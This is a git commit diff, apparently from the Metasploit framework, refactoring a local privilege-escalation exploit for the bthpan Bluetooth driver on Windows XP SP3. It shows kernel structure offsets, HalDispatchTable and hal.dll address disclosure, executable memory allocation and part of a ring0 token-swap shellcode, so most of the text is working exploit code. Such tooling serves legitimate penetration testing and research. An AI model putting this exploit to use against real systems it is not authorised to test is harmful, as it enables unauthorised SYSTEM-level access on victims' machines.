Merge in changes from @todb-r7.
Jay Smith
parent
b55f425ec0
commit
7dd6a4d0d9
|
|
@ -4,11 +4,13 @@
|
|||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'msf/core/exploit/local/windows_kernel'
|
||||
require 'rex'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Local
|
||||
Rank = AverageRanking
|
||||
|
||||
include Msf::Exploit::Local::WindowsKernel
|
||||
include Msf::Post::File
|
||||
include Msf::Post::Windows::FileInfo
|
||||
include Msf::Post::Windows::Priv
|
||||
|
|
@ -39,8 +41,15 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic', {} ],
|
||||
[ 'Windows XP SP3', {} ]
|
||||
['Windows XP SP3',
|
||||
{
|
||||
'HaliQuerySystemInfo' => 0x16bba,
|
||||
'_KPROCESS' => "\x44",
|
||||
'_TOKEN' => "\xc8",
|
||||
'_UPID' => "\x84",
|
||||
'_APLINKS' => "\x88"
|
||||
}
|
||||
]
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
|
|
@ -52,60 +61,6 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
))
|
||||
end
|
||||
|
||||
def add_railgun_functions
|
||||
session.railgun.add_dll('psapi') unless session.railgun.dlls.keys.include?('psapi')
|
||||
session.railgun.add_function(
|
||||
'psapi',
|
||||
'EnumDeviceDrivers',
|
||||
'BOOL',
|
||||
[
|
||||
["PBLOB", "lpImageBase", "out"],
|
||||
["DWORD", "cb", "in"],
|
||||
["PDWORD", "lpcbNeeded", "out"]
|
||||
])
|
||||
session.railgun.add_function(
|
||||
'psapi',
|
||||
'GetDeviceDriverBaseNameA',
|
||||
'DWORD',
|
||||
[
|
||||
["LPVOID", "ImageBase", "in"],
|
||||
["PBLOB", "lpBaseName", "out"],
|
||||
["DWORD", "nSize", "in"]
|
||||
])
|
||||
end
|
||||
|
||||
def open_device(dev)
|
||||
invalid_handle_value = 0xFFFFFFFF
|
||||
|
||||
r = session.railgun.kernel32.CreateFileA(dev, "FILE_SHARE_WRITE|FILE_SHARE_READ", 0, nil, "OPEN_EXISTING", 0, nil)
|
||||
|
||||
handle = r['return']
|
||||
|
||||
if handle == invalid_handle_value
|
||||
return nil
|
||||
else
|
||||
return handle
|
||||
end
|
||||
end
|
||||
|
||||
# @return [Array, nil] the address and driver name or nil
|
||||
# if the driver name of 'krnl' isn't found
|
||||
def find_sys_base
|
||||
results = session.railgun.psapi.EnumDeviceDrivers(4096, 1024, 4)
|
||||
addresses = results['lpImageBase'][0, results['lpcbNeeded']].unpack("V*")
|
||||
driver_array = nil
|
||||
|
||||
addresses.each do |address|
|
||||
results = session.railgun.psapi.GetDeviceDriverBaseNameA(address, 48, 48)
|
||||
current_drvname = results['lpBaseName'][0, results['return']]
|
||||
if current_drvname.downcase.include?('krnl')
|
||||
driver_array = [address, current_drvname]
|
||||
break
|
||||
end
|
||||
end
|
||||
|
||||
return driver_array
|
||||
end
|
||||
|
||||
def ring0_shellcode
|
||||
tokenswap = "\x60\x64\xA1\x24\x01\x00\x00"
|
||||
|
|
@ -124,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
end
|
||||
|
||||
def fill_memory(proc, address, length, content)
|
||||
session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack("L"), nil, [ length ].pack("L"), "MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN", "PAGE_EXECUTE_READWRITE")
|
||||
session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack('V'), nil, [ length ].pack('V'), "MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN", "PAGE_EXECUTE_READWRITE")
|
||||
|
||||
unless proc.memory.writable?(address)
|
||||
vprint_error("Failed to allocate memory")
|
||||
|
|
@ -146,41 +101,28 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
def disclose_addresses(t)
|
||||
addresses = {}
|
||||
|
||||
vprint_status("Getting the Kernel module name...")
|
||||
kernel_info = find_sys_base
|
||||
unless kernel_info
|
||||
vprint_error("Failed to disclose the Kernel module name")
|
||||
hal_dispatch_table = find_haldispatchtable
|
||||
return nil if hal_dispatch_table.nil?
|
||||
addresses['halDispatchTable'] = hal_dispatch_table
|
||||
vprint_good("HalDispatchTable found at 0x#{addresses['halDispatchTable'].to_s(16)}")
|
||||
|
||||
vprint_status('Getting the hal.dll base address...')
|
||||
hal_info = find_sys_base('hal.dll')
|
||||
if hal_info.nil?
|
||||
vprint_error('Failed to disclose hal.dll base address')
|
||||
return nil
|
||||
end
|
||||
vprint_good("Kernel module found: #{kernel_info[1]}")
|
||||
hal_base = hal_info[0]
|
||||
vprint_good("hal.dll base address disclosed at 0x#{hal_base.to_s(16)}")
|
||||
|
||||
vprint_status("Getting a Kernel handle...")
|
||||
kernel32_handle = session.railgun.kernel32.LoadLibraryExA(kernel_info[1], 0, 1)
|
||||
kernel32_handle = kernel32_handle['return']
|
||||
if kernel32_handle == 0
|
||||
vprint_error("Failed to get a Kernel handle")
|
||||
return nil
|
||||
end
|
||||
vprint_good("Kernel handle acquired")
|
||||
hali_query_system_information = hal_base + t['HaliQuerySystemInfo']
|
||||
addresses['HaliQuerySystemInfo'] = hali_query_system_information
|
||||
|
||||
vprint_status("Disclosing the HalDispatchTable...")
|
||||
hal_dispatch_table = session.railgun.kernel32.GetProcAddress(kernel32_handle, "HalDispatchTable")
|
||||
hal_dispatch_table = hal_dispatch_table['return']
|
||||
if hal_dispatch_table == 0
|
||||
vprint_error("Failed to disclose the HalDispatchTable")
|
||||
return nil
|
||||
end
|
||||
hal_dispatch_table -= kernel32_handle
|
||||
hal_dispatch_table += kernel_info[0]
|
||||
addresses["halDispatchTable"] = hal_dispatch_table
|
||||
vprint_good("HalDispatchTable found at 0x#{addresses["halDispatchTable"].to_s(16)}")
|
||||
|
||||
return addresses
|
||||
vprint_good("HaliQuerySystemInfo address disclosed at 0x#{addresses['HaliQuerySystemInfo'].to_s(16)}")
|
||||
addresses
|
||||
end
|
||||
|
||||
def check
|
||||
add_railgun_functions
|
||||
|
||||
if sysinfo["Architecture"] =~ /wow64/i || sysinfo["Architecture"] =~ /x64/
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
|
@ -188,7 +130,7 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
os = sysinfo["OS"]
|
||||
return Exploit::CheckCode::Safe unless os =~ /windows xp.*service pack 3/i
|
||||
|
||||
handle = open_device("\\\\.\\bthpan")
|
||||
handle = open_device("\\\\.\\bthpan", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
|
||||
return Exploit::CheckCode::Safe unless handle
|
||||
|
||||
session.railgun.kernel32.CloseHandle(handle)
|
||||
|
|
@ -205,17 +147,17 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system")
|
||||
end
|
||||
|
||||
handle = open_device("\\\\.\\bthpan")
|
||||
handle = open_device("\\\\.\\bthpan", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
|
||||
if handle.nil?
|
||||
fail_with(Failure::NoTarget, "Unable to open \\\\.\\bthpan device")
|
||||
end
|
||||
|
||||
my_target = targets[1]
|
||||
my_target = targets[0]
|
||||
print_status("Disclosing the HalDispatchTable address...")
|
||||
@addresses = disclose_addresses(my_target)
|
||||
if @addresses.nil?
|
||||
session.railgun.kernel32.CloseHandle(handle)
|
||||
fail_with(Failure::Unknown, "Filed to disclose necessary address for exploitation. Aborting.")
|
||||
fail_with(Failure::Unknown, "Failed to disclose necessary address for exploitation. Aborting.")
|
||||
else
|
||||
print_good("Address successfully disclosed.")
|
||||
end
|
||||
|
|
|
|||
Loading…
Reference in New Issue